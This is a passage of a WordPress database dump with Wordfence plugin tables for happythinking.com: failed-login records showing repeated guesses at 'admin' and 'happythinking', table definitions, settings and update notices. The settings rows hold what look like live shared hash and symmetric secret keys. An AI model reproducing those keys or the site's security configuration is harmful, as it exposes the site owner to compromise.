(10265, 50091, 1710995258.685986, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃˆO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10264, 50090, 1710995257.995127, 1, 'loginFailInvalidUsername', 'crander', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃˆO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10263, 50075, 1710974924.536895, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ/\\‡„', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),
(10262, 50073, 1710974915.705812, 1, 'loginFailInvalidUsername', 'lupac', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1é$Ö', 'Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10261, 50072, 1710974907.953735, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{ù#', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),
(10331, 51083, 1712319004.514022, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅýr', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10307, 50746, 1711910987.819037, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜*¶¿', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10627, 51466, 1712320718.948993, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅùu…', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10628, 51467, 1712320719.165499, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.9m', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10629, 51469, 1712320727.129561, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿš~º', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10630, 51470, 1712320728.173329, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅùÀÁ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10631, 51471, 1712320743.960884, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''+ÝX', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10632, 51473, 1712320750.222023, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)øeÃ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10633, 51474, 1712320751.069914, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿjØu¸', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10634, 51475, 1712320751.273856, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ>JÔ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10635, 51476, 1712320754.050386, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß€z', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10636, 51477, 1712320759.922029, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|{"', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10637, 51478, 1712320763.789979, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ç›', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10638, 51479, 1712320765.002739, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-©Ì®', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10639, 51480, 1712320767.313681, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)–Ûý', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10640, 51481, 1712320774.475214, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾HNh', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10641, 51482, 1712320776.065738, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥pá', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10642, 51483, 1712320777.052577, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ%ƒ+I', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10643, 51484, 1712320784.424159, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº„Äd', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10644, 51485, 1712320786.506282, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÙó…', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10645, 51486, 1712320786.710222, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿjÙlÇ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10646, 51487, 1712320797.976726, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿMSÈ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10647, 51488, 1712320807.221975, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz59', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10648, 51489, 1712320807.613824, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/GÖ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10649, 51490, 1712320812.123719, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg''÷ž', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10650, 51491, 1712320821.724473, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ])"', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10651, 51492, 1712320823.123715, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼yb', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10652, 51495, 1712320827.848981, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·S¤', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10653, 51496, 1712320833.726405, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ`×z', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10654, 51497, 1712320834.072843, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿel\Z¡', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10655, 51498, 1712320850.678066, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¹lp', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10656, 51499, 1712320851.867473, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ÝÎ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10657, 51501, 1712320868.422678, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾gÍ²', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10658, 51502, 1712320869.362905, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶GHå', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10659, 51503, 1712320872.458784, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠT$7', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10660, 51504, 1712320872.759975, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿyzu(', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10661, 51505, 1712320886.566639, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿi®&ê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10662, 51506, 1712320889.944857, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾mI', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10663, 51507, 1712320893.178300, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿoß¼0', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10664, 51509, 1712320908.866459, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2bGé', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10665, 51511, 1712320919.464900, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''{tü', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10666, 51513, 1712320930.484018, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgµã´', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10667, 51514, 1712320930.933120, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿfºš', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10668, 51515, 1712320936.705159, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀ†©', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10669, 51516, 1712320938.321260, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3®±', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10670, 51517, 1712320941.307788, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWÊ€Ô', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10671, 51518, 1712320951.410015, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¹®`', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10672, 51519, 1712320951.941169, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ''îl', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10673, 51520, 1712320960.940578, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$KCœ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10674, 51521, 1712320961.032529, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%Ùð', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10675, 51523, 1712320963.495392, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿË ¢B', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10676, 51524, 1712320968.291773, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ=$>', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10677, 51525, 1712320979.019827, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ°`', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10678, 51526, 1712320982.493675, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&3', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10679, 51527, 1712320983.802385, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgi×Ž', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10680, 51528, 1712320991.053286, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnàTÅ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10681, 51529, 1712321005.066675, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹gó', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10682, 51532, 1712321021.281032, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)TÄ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10683, 51533, 1712321021.942166, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿƒH«j', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10684, 51534, 1712321032.559308, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿš¡4', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10685, 51535, 1712321040.664619, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜nãÒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10686, 51536, 1712321041.348942, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÌˆŠ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10687, 51537, 1712321058.163226, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-p\0u', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10688, 51538, 1712321059.021542, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿqÇç·', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10689, 51539, 1712321076.961215, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf°kb', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10690, 51540, 1712321086.122626, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿfÚà(', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10691, 51541, 1712321096.039840, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$Aˆh', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10692, 51542, 1712321101.544244, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅój', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10693, 51543, 1712321144.867052, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß¶Õz', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10694, 51544, 1712321323.587355, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉDŒÓ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10695, 51545, 1712321345.926589, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÄOc', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10696, 51546, 1712321419.114236, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3\\œ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10697, 51546, 1712321419.125112, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3\\œ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10698, 51548, 1712321658.457186, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwoÇv', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10699, 51549, 1712322110.320553, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·‚', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10700, 51554, 1712325245.456880, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg£¿', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10701, 51555, 1712325705.921539, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1—\nï', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10702, 51555, 1712325705.940828, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1—\nï', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10703, 51557, 1712326585.255518, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿidË3', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10704, 51559, 1712328649.847692, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼ÓÏú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10705, 51565, 1712335324.747469, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwIh', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10706, 51590, 1712339686.803146, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.c', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10707, 51593, 1712342456.349919, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ(Mÿ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10708, 51594, 1712343464.296613, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\5#Ó', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10709, 51599, 1712345876.582238, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨ÄËY', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfls_2fa_secrets`
--

CREATE TABLE `wpou_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfls_role_counts`
--

CREATE TABLE `wpou_wfls_role_counts` (
  `serialized_roles` varbinary(255) NOT NULL,
  `two_factor_inactive` tinyint(1) NOT NULL,
  `user_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`serialized_roles`,`two_factor_inactive`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfls_settings`
--

CREATE TABLE `wpou_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfls_settings`
--

INSERT INTO `wpou_wfls_settings` VALUES
('2fa-user-grace-period', '10', 'yes'),
('allow-disabling-ntp', '1', 'yes'),
('allow-xml-rpc', '1', 'yes'),
('captcha-stats', '{"counts":[0,0,0,0,0,0,0,0,0,0,0],"avg":0}', 'yes'),
('delete-deactivation', '', 'yes'),
('disable-temporary-tables', '0', 'yes'),
('enable-auth-captcha', '', 'yes'),
('enable-login-history-columns', '1', 'yes'),
('enable-shortcode', '', 'yes'),
('enable-woocommerce-account-integration', '', 'yes'),
('enable-woocommerce-integration', '', 'yes'),
('global-notices', '[]', 'yes'),
('ip-source', '', 'yes'),
('ip-trusted-proxies', '', 'yes'),
('last-secret-refresh', '1698195078', 'yes'),
('ntp-failure-count', '0', 'yes'),
('ntp-offset', '0.64863443374634', 'yes'),
('recaptcha-threshold', '0.5', 'yes'),
('remember-device', '', 'yes'),
('remember-device-duration', '2592000', 'yes'),
('require-2fa-grace-period-enabled', '', 'yes'),
('require-2fa.administrator', '', 'yes'),
('schema-version', '2', 'yes'),
('shared-hash-secret', '0da86c1ec4e2b2e261fbc04ea5177ad62922d96060c73d45ce6e3595f2a565ac', 'yes'),
('shared-symmetric-secret', '09a31cf9d229be4015b743cf8a7a13fed2abc68de6941a1640541a7b2fabd13f', 'yes'),
('stack-ui-columns', '1', 'yes'),
('use-ntp', '1', 'yes'),
('user-count-query-state', '0', 'yes'),
('whitelisted', '', 'yes'),
('xmlrpc-enabled', '1', 'yes');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfnotifications`
--

CREATE TABLE `wpou_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfnotifications`
--

INSERT INTO `wpou_wfnotifications` VALUES
('site-AEAAAAA', 0, 'wfplugin_updates', 502, 1682710691, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-AIAAAAA', 0, 'wfplugin_updates', 502, 1683709481, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-AMAAAAA', 0, 'wfplugin_updates', 502, 1684400727, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-AQAAAAA', 0, 'wfplugin_updates', 502, 1685561876, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('network-GQ2TGNZW', 1, 'toupp-20220714', 100, 1712693145, '<p><strong>Wordfence Terms of Service and UK IDTA</strong></p>\n<p>Please review the updated Terms of Service with the new UK IDTA.\n</p>\n<p><a href="https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714" class="wf-btn wf-btn-callout wf-btn-primary" target="_blank">Terms of Service</a> <a href="https://www.wordfence.com/uk-international-data-transfer-addendum/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714" class="wf-btn wf-btn-callout wf-btn-primary" target="_blank">UK IDTA</a></p>\n', '[]'),
('site-AUAAAAA', 0, 'wfplugin_updates', 502, 1686643059, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-AYAAAAA', 0, 'wfplugin_updates', 502, 1687370546, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-A4AAAAA', 0, 'wfplugin_updates', 502, 1689185184, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-BIAAAAA', 0, 'wfplugin_scan', 502, 1689185248, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-BMAAAAA', 0, 'wfplugin_updates', 502, 1689617347, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-BUAAAAA', 0, 'wfplugin_scan', 502, 1689617347, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-CAAAAAA', 0, 'wfplugin_updates', 502, 1690314197, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 2 plugins</a>', '[]'),
('site-CIAAAAA', 0, 'wfplugin_updates', 502, 1690820254, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-CMAAAAA', 0, 'wfplugin_updates', 502, 1691568412, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-CUAAAAA', 0, 'wfplugin_updates', 502, 1691685046, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-CYAAAAA', 0, 'wfplugin_scan', 502, 1691685769, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
